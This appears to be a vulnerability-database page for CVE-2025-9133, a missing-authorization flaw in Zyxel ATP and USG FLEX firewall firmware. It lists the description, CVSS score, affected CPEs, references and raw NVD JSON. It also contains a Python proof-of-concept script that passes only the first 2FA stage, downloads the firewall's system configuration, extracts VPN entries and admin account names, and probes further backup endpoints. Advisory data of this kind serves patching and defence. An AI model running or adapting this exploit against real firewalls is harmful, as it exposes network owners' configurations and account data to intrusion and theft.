CVE-2025-9133

Description

A missing authorization vulnerability in Zyxel ATP series firmware versions from V4.32 through V5.40, USG FLEX series firmware versions from V4.50 through V5.40, USG FLEX 50(W) series firmware versions from V4.16 through V5.40, and USG20(W)-VPN series firmware versions from V4.16 through V5.40 could allow a semi-authenticated attacker—who has completed only the first stage of the two-factor authentication (2FA) process—to view and download the system configuration from an affected device.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:usg_flex_100ax:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:usg_20w-vpn:*:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:* - NOT VULNERABLE

Zyxel ATP系列固件 V4.32 ≤ 版本 ≤ V5.40

Zyxel USG FLEX系列固件 V4.50 ≤ 版本 ≤ V5.40

Zyxel USG FLEX 50(W)系列固件 V4.16 ≤ 版本 ≤ V5.40

Zyxel USG20(W)-VPN系列固件 V4.16 ≤ 版本 ≤ V5.40

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-9133 PoC - Zyxel Firewall Missing Authorization
# Exploits missing authorization after 2FA first stage authentication
# to download system configuration without completing second factor

import requests
import re

TARGET = "https://<target-zyxel-firewall>"
USERNAME = "admin"
PASSWORD = "password123"

session = requests.Session()

# Step 1: Perform first stage authentication (username + password)
print("[*] Attempting first stage 2FA authentication...")
login_url = f"{TARGET}/cgi-bin/authentication.cgi"
login_payload = {
    "username": USERNAME,
    "password": PASSWORD,
    "logintype": "0"  # Standard login
}

response = session.post(login_url, data=login_payload, verify=False)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Extract partial session cookie/token after first stage
# The session is partially authenticated but 2FA second factor is pending
cookies = session.cookies.get_dict()
print(f"[*] Session cookies obtained: {cookies}")

# Step 3: Exploit missing authorization - access config download endpoint
# without completing the second factor of 2FA
print("[*] Attempting to download system configuration (bypassing 2FA second stage)...")
config_url = f"{TARGET}/cgi-bin/export-cgi?category=config&type=startup-config"

# The vulnerability: the endpoint does not verify 2FA completion
response = session.get(config_url, verify=False)

if response.status_code == 200:
    print("[+] SUCCESS: System configuration downloaded!")
    # Save the configuration file
    with open("zyxel_config_backup.conf", "wb") as f:
        f.write(response.content)
    print("[+] Configuration saved to zyxel_config_backup.conf")
    # Extract sensitive data from config
    config_content = response.text
    vpn_keys = re.findall(r"vpn\s+(\S+)", config_content)
    admin_users = re.findall(r"username\s+(\S+)", config_content)
    print(f"[*] Found VPN entries: {vpn_keys}")
    print(f"[*] Found admin accounts: {admin_users}")
else:
    print(f"[-] Failed with status code: {response.status_code}")

# Alternative endpoint variations
endpoints = [
    "/cgi-bin/export-cgi?category=config",
    "/cgi-bin/maintenance/configuration_backup.cgi",
    "/cgi-bin/backup.conf",
    "/cgi-bin/zysh-cgi",
]

for endpoint in endpoints:
    url = f"{TARGET}{endpoint}"
    resp = session.get(url, verify=False)
    if resp.status_code == 200 and len(resp.content) > 100:
        print(f"[+] Accessible endpoint found: {endpoint}")
        break

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9133
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9133
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9133/
[4] VulDB https://vuldb.com/cve/CVE-2025-9133
[5] https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-and-missing-authorization-vulnerabilities-in-zld-firewalls-10-21-2025

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9133", "sourceIdentifier": "[email protected]", "published": "2025-10-21T03:15:36.563", "lastModified": "2025-10-28T19:18:15.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authorization vulnerability in Zyxel ATP series firmware versions from V4.32 through V5.40, USG FLEX series firmware versions from V4.50 through V5.40, USG FLEX 50(W) series firmware versions from V4.16 through V5.40, and USG20(W)-VPN series firmware versions from V4.16 through V5.40 could allow a semi-authenticated attacker—who has completed only the first stage of the two-factor authentication (2FA) process—to view and download the system configuration from an affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.32", "versionEndExcluding": "5.41", "matchCriteriaId": "6A48C1EF-AAAE-49F7-874E-A87745096960"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F7654A1-3806-41C7-82D4-46B0CD7EE53B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*", "matchCriteriaId": "47398FD0-6C5E-4625-9EFD-DE08C9AB7DB2"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D68A36FF-8CAF-401C-9F18-94F3A2405CF4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*", "matchCriteriaId": "2818E8AC-FFEE-4DF9-BF3F-C75166C0E851"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*", "matchCriteriaId": "0B41F437-855B-4490-8011-DF59887BE6D5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*", "matchCriteriaId": "66B99746-0589-46E6-9CBD-F38619AD97DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.50", "versionEndExcluding": "5.41", "matchCriteriaId": "D553EB25-CB12-4245-B522-3D4B75D5F221"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B30A4C0-9928-46AD-9210-C25656FB43FB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_100ax:-:*:*:*:*:*:*:*", "matchCriteriaId": "03036815-04AE-4E39-8310-DA19A32CFA48"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*", "matchCriteriaId": "D74ABA7E-AA78-4A13-A64E-C44021591B42"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*", "matchCriteriaId": "F93B6A06-2951-46D2-A7E1-103D7318D612"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*", "matchCriteriaId": "646C1F07-B553-47B0-953B-DC7DE7FD0F8B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*", "matchCriteriaId": "92C697A5-D1D3-4FF0-9C43-D27B18181958"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_50ax:-:*:*:*:*:*:*:*", "matchCriteriaId": "84936549-57C8-4F5C-9DA3-829A2290BB75"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1396E3-731B-4D05-A3F8-F3ABB80D5C29"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.16", "versionEndExcluding": "5.41", "matchCriteriaId": "1822AD84-E658-48E7-A105-EEE6B3A2F914"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_20w-vpn:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D304892-0F94-484E-966F-326AFEDCE072"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*", "matchCriteriaId": "110A1CA4-0170-4834-8281-0A3E14FC5584"}]}]}], "references": [{"url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-and-missing-authorization-vulnerabilities-in-zld-firewalls-10-21-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}